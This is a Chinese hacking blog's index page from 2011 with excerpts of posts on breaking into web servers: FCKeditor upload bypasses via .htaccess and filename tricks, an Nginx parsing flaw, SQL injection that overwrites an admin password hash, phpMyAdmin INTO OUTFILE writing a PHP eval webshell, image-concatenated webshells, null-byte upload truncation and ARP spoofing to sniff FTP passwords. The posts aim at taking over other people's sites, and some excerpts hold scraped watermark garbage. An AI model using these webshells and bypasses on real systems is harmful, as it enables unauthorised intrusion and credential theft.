上一页 1 ··· 12 13 14 15 16 17 18 19 20 ··· 30 下一页

2011年9月4日

FCKeditor所有版本任意文件上传缺陷

摘要: In The Name Of GOD[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability[+] Date: 2011[+] script:http://sourceforge.net/projects/fckeditor/[+] Author: pentesters.ir[+] Website : WwW.PenTesters.IR利用步骤:1.创建一个htaccess文件:代码内容:<FilesMatch “_php.gif”>SetHandler application/x-httpd-php&l 阅读全文

posted @ 2011-09-04 08:33 =_=! 阅读(700) 评论(0) 推荐(0) 编辑

fckeditor上传.变_突破

摘要: 有很多已经修补过的fckeditor 我们上传 x.asp;y.jpg的时候 通常会变成 x_asp;y.jpg 让我们的马失效利用二次上传 可以 生成 x(2).asp;y.jpg 可以突破 有些时候打了补丁的 让我们还是无法突破 通常 我们在editor/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.cnblogs.com/connectors/asp/connector.asp新建 一个x.asp的文件夹 可饶过, 但有些变态的 程序 会将我们建立 阅读全文

posted @ 2011-09-04 07:41 =_=! 阅读(247) 评论(0) 推荐(0) 编辑

2011年9月2日

Nginx最新0day

摘要: 昨晚黑锅在微博上发了老外爆的Nginx漏洞,开始并没几个人关注,小我马上架环境测试验证了,我人品好随手在网上试了两个网站也验证了这个漏洞,于是乎马上就在微博上传开了。这个漏洞是7月20日发的,老外做了非常详细的分析,大家可以深入参考:https://nealpoole.com/blog/2011/07/possible-arbitrary-code-execution-with-null-bytes-php-and-old-versions-of-nginx/这里我就说说关于这个漏洞的几个隐蔽点和关键点:一.老肉鸡变新肉鸡大家应该还记得80sec发的nginx文件类型错误解析漏洞吧http:/ 阅读全文

posted @ 2011-09-02 08:57 =_=! 阅读(430) 评论(0) 推荐(0) 编辑

2011年8月30日

reDuh突破硬防连接3389

该文被密码保护。 阅读全文

posted @ 2011-08-30 04:31 =_=! 阅读(3) 评论(0) 推荐(0) 编辑

2011年7月7日

sql注射修改管理密码

摘要: 很多时候我们找到了注入点,管理员用户名也猜到了,可就是破解不了Md5密文。很多人到这里都会选择放弃。我们知道sql注入可以进行字段查询,既然可以查询,那么它同样也可以进行字段更新。我们只要把管理员密码的Md5值替换为我们自己的可破解的Md5即可。 注入点已经找到:http://xxx.com/book.asp?id=1996 我刚已经用NB检测过了。可以看到,存在表段 shop_admin。 密码是MD5加密的:[adminid]:24 [admin]:zhuyaod [password]:d4716077c2ba075c 注射的语句如下: ;update shop_admin set pas 阅读全文

posted @ 2011-07-07 17:31 =_=! 阅读(307) 评论(0) 推荐(0) 编辑

2011年7月6日

phpmyadmin拿shell的四种方法总结

摘要: 方法一:CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php一句话连接密码:7on方法二:读取文件内容: select 阅读全文

posted @ 2011-07-06 23:17 =_=! 阅读(1583) 评论(0) 推荐(0) 编辑

2011年7月4日

cain嗅探突破ARP防火墙的小技巧

摘要: 今天嫌着无事,来试下内网arp欺骗,我在本机搭建一了一个虚拟机系统(XP SP2),以虚拟机为目标,在本机发起攻击,其实就是欺骗网关来达到目的,目标是截取到虚拟机登陆到外网FTP时候的密码与帐号,测试完全成功。成功截取到我空间的帐号密码.然而上面只是针对目前未装arp防火墙的机器而已,自从arp防火墙出来后,好像大家遇到装了arp防火墙的服务器就没办法了。其实arp防火墙的原理就是不停的向网关发arp包刷新arp表,如果我们单独用一个发包工具,发包的速度比arp防火墙的速度快,告诉网关我是被欺骗的主机ip和mac,由于我发包的速度比arp防火墙快,网关应对我的包要多一些,所以就把我当成被欺骗的 阅读全文

posted @ 2011-07-04 21:14 =_=! 阅读(658) 评论(0) 推荐(0) 编辑

2011年7月3日

文件上传字符截断与NC提交技巧

摘要: 上传文件一般是upload.asp,upfile.asp,一般可以定义文件路径,也就是uppath,而一般程序会判定后缀的,比如限定不能等于asp,aspx,asa,那么可以传cdx、cer或php(服务器支持),或者判定只能是.jpg,.gif,那么就必须使用截断方式来处理了,这儿详细说明一下。具体过程细节为:1.正常提交图片上传(最好是简单的一句话木马)2.抓包,将刚才的包抓下来,拷贝post数据出来,存成txt3.编辑包,用十进制工具编辑,增加00。4.重新提交包,nc(netcat)最原始了,也最有效。对于路径截断,主要在文件名还有路径那两种可能,下面来试试,这儿参考动网的上传漏洞与某 阅读全文

posted @ 2011-07-03 11:35 =_=! 阅读(564) 评论(0) 推荐(0) 编辑

2011年7月2日

新方法突破上传限制

摘要: 下午,朋友丢来一个后台,说搞不定,要拿个SHELL。偶进去翻了一下,没发现太多利用的地方,就一个添加文章和上传图片的地方。添加文章直接生成一个ASPX文件,但不知道哪些东西可以写进去,没源码,随便试了下,插了几个代码都没成功,估计不是有过滤就是直接写进库了,于是放弃这条路。来看看上传,上传一个正常的图片可以直接上传,ASP马无论改名与否都直接报错。看来是检查是不是图片了,这个好办,直接写了个一句话马,找了张正常图片,Copy /b 1.jpg+2.asp 3.asp www.t00ls.net; t3 Q0 q% u; g& q# Y2 `成功上传,但结果用客户端连接却不成功,不晓得程 阅读全文

posted @ 2011-07-02 17:10 =_=! 阅读(1016) 评论(0) 推荐(0) 编辑

2011年6月29日

关于mssql数据库下的一些注入技巧

摘要: 小弟刚来,发点小文章给各位看官养养眼吧,都是平时渗透测试时的一些思路总结。见笑了 Sql的注射最早源于’or’1’=’1) 最重要的表名: select * from sysobjectswww.t00ls.net$ y/ _8 j5 Y0 L( Q+ Y# M sysobjects ncsysobjects sysindexes tsysindexeswww.t00ls.net7 _4 u) d' E$ k$ g& m* J syscolumns systypes3 `3 d* n9 k# D$ C* S. o& K sysusers sysdatabases3 @* 阅读全文

posted @ 2011-06-29 15:27 =_=! 阅读(267) 评论(0) 推荐(0) 编辑

上一页 1 ··· 12 13 14 15 16 17 18 19 20 ··· 30 下一页

导航